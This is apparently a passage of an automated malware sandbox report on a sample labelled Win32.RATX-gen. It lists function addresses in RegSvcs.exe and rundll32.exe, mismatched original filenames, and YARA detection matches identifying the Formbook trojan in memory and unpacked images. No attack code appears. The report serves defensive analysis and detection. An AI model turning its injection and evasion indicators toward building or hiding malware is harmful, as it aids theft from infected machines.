Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012368B8	13_2_012368B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0127E8F0	13_2_0127E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130AB40	13_2_0130AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01306BD7	13_2_01306BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0124EA80	13_2_0124EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0125AD00	13_2_0125AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012ECD1F	13_2_012ECD1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01268DBF	13_2_01268DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0124ADE0	13_2_0124ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01250C00	13_2_01250C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012F0CB5	13_2_012F0CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01240CF2	13_2_01240CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01292F28	13_2_01292F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01270F30	13_2_01270F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012F2F30	13_2_012F2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012C4F40	13_2_012C4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012CEFA0	13_2_012CEFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0125CFE0	13_2_0125CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01242FC8	13_2_01242FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130EE26	13_2_0130EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01250E59	13_2_01250E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130CE93	13_2_0130CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01262E90	13_2_01262E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130EEDB	13_2_0130EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0128516C	13_2_0128516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0123F172	13_2_0123F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0131B16B	13_2_0131B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0125B1B0	13_2_0125B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130F0E0	13_2_0130F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_013070E9	13_2_013070E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012FF0CC	13_2_012FF0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012570C0	13_2_012570C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130132D	13_2_0130132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0123D34C	13_2_0123D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0129739A	13_2_0129739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012552A0	13_2_012552A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012F12ED	13_2_012F12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0126B2C0	13_2_0126B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01307571	13_2_01307571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012ED5B0	13_2_012ED5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_013195C3	13_2_013195C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130F43F	13_2_0130F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01241460	13_2_01241460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130F7B0	13_2_0130F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01295630	13_2_01295630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_013016CC	13_2_013016CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012E5910	13_2_012E5910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01259950	13_2_01259950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0126B950	13_2_0126B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012BD800	13_2_012BD800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012538E0	13_2_012538E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130FB76	13_2_0130FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0126FB80	13_2_0126FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0128DBF9	13_2_0128DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012C5BF0	13_2_012C5BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012C3A6C	13_2_012C3A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01307A46	13_2_01307A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130FA49	13_2_0130FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012EDAAC	13_2_012EDAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01295AA0	13_2_01295AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012F1AA3	13_2_012F1AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012FDAC6	13_2_012FDAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01307D73	13_2_01307D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01253D40	13_2_01253D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01301D5A	13_2_01301D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0126FDC0	13_2_0126FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012C9C32	13_2_012C9C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130FCF2	13_2_0130FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130FF09	13_2_0130FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130FFB1	13_2_0130FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01251F92	13_2_01251F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01213FD2	13_2_01213FD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01213FD5	13_2_01213FD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01259EB0	13_2_01259EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CFE4F6	15_2_04CFE4F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D02446	15_2_04D02446
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CF4420	15_2_04CF4420
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D10591	15_2_04D10591
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C50535	15_2_04C50535
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C6C6E0	15_2_04C6C6E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C4C7C0	15_2_04C4C7C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C74750	15_2_04C74750
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C50770	15_2_04C50770
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CE2000	15_2_04CE2000
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D081CC	15_2_04D081CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D041A2	15_2_04D041A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D101AA	15_2_04D101AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CD8158	15_2_04CD8158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C40100	15_2_04C40100
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CEA118	15_2_04CEA118
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CD02C0	15_2_04CD02C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CF0274	15_2_04CF0274
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C5E3F0	15_2_04C5E3F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D103E6	15_2_04D103E6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0A352	15_2_04D0A352
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C40CF2	15_2_04C40CF2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CF0CB5	15_2_04CF0CB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C50C00	15_2_04C50C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C4ADE0	15_2_04C4ADE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C68DBF	15_2_04C68DBF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C5AD00	15_2_04C5AD00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CECD1F	15_2_04CECD1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0EEDB	15_2_04D0EEDB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0CE93	15_2_04D0CE93
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C62E90	15_2_04C62E90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C50E59	15_2_04C50E59
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0EE26	15_2_04D0EE26
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C42FC8	15_2_04C42FC8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C5CFE0	15_2_04C5CFE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CCEFA0	15_2_04CCEFA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CC4F40	15_2_04CC4F40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C92F28	15_2_04C92F28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C70F30	15_2_04C70F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CF2F30	15_2_04CF2F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C7E8F0	15_2_04C7E8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C368B8	15_2_04C368B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C52840	15_2_04C52840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C5A840	15_2_04C5A840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C529A0	15_2_04C529A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D1A9A6	15_2_04D1A9A6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C66962	15_2_04C66962
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C4EA80	15_2_04C4EA80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D06BD7	15_2_04D06BD7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0AB40	15_2_04D0AB40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C41460	15_2_04C41460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0F43F	15_2_04D0F43F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D195C3	15_2_04D195C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CED5B0	15_2_04CED5B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D07571	15_2_04D07571
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D016CC	15_2_04D016CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C95630	15_2_04C95630
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0F7B0	15_2_04D0F7B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CFF0CC	15_2_04CFF0CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C570C0	15_2_04C570C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0F0E0	15_2_04D0F0E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D070E9	15_2_04D070E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C5B1B0	15_2_04C5B1B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C8516C	15_2_04C8516C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C3F172	15_2_04C3F172
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D1B16B	15_2_04D1B16B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C6B2C0	15_2_04C6B2C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CF12ED	15_2_04CF12ED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C552A0	15_2_04C552A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C9739A	15_2_04C9739A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C3D34C	15_2_04C3D34C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0132D	15_2_04D0132D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0FCF2	15_2_04D0FCF2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CC9C32	15_2_04CC9C32
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C6FDC0	15_2_04C6FDC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C53D40	15_2_04C53D40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D01D5A	15_2_04D01D5A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D07D73	15_2_04D07D73
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C59EB0	15_2_04C59EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C13FD2	15_2_04C13FD2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C13FD5	15_2_04C13FD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C51F92	15_2_04C51F92
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0FFB1	15_2_04D0FFB1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0FF09	15_2_04D0FF09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C538E0	15_2_04C538E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CBD800	15_2_04CBD800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C59950	15_2_04C59950
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C6B950	15_2_04C6B950
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CE5910	15_2_04CE5910
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CFDAC6	15_2_04CFDAC6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CEDAAC	15_2_04CEDAAC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C95AA0	15_2_04C95AA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CF1AA3	15_2_04CF1AA3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D07A46	15_2_04D07A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0FA49	15_2_04D0FA49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CC3A6C	15_2_04CC3A6C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C8DBF9	15_2_04C8DBF9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CC5BF0	15_2_04CC5BF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C6FB80	15_2_04C6FB80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0FB76	15_2_04D0FB76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B6D7FE	15_2_02B6D7FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B6E53C	15_2_02B6E53C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B59E60	15_2_02B59E60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B52FB0	15_2_02B52FB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B52D90	15_2_02B52D90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B52D89	15_2_02B52D89
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AAA036	15_2_04AAA036
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AAE5CD	15_2_04AAE5CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AA2D02	15_2_04AA2D02
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AA1082	15_2_04AA1082
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AA8912	15_2_04AA8912
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AAB232	15_2_04AAB232
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AA5B32	15_2_04AA5B32
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AA5B30	15_2_04AA5B30

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 012BEA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 01285130 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 011AEA12 appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 012CF290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 01297E54 appears 111 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0123B970 appears 280 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 01187E54 appears 97 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 04CCF290 appears 105 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 04C3B970 appears 280 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 04C85130 appears 58 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 04CBEA12 appears 86 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 04C97E54 appears 111 times

Sample file is different than original file name gathered from version info

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, 00000000.00000002.2158150951.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMML.dll2 vs SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, 00000000.00000002.2162617003.00000000070D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, 00000000.00000002.2156300043.000000000105E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, 00000000.00000002.2162157198.00000000057D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMML.dll2 vs SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, 00000000.00000002.2158917960.0000000003F7E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Binary or memory string: OriginalFilenamedKJy.exe: vs SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Uses 32bit PE files

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
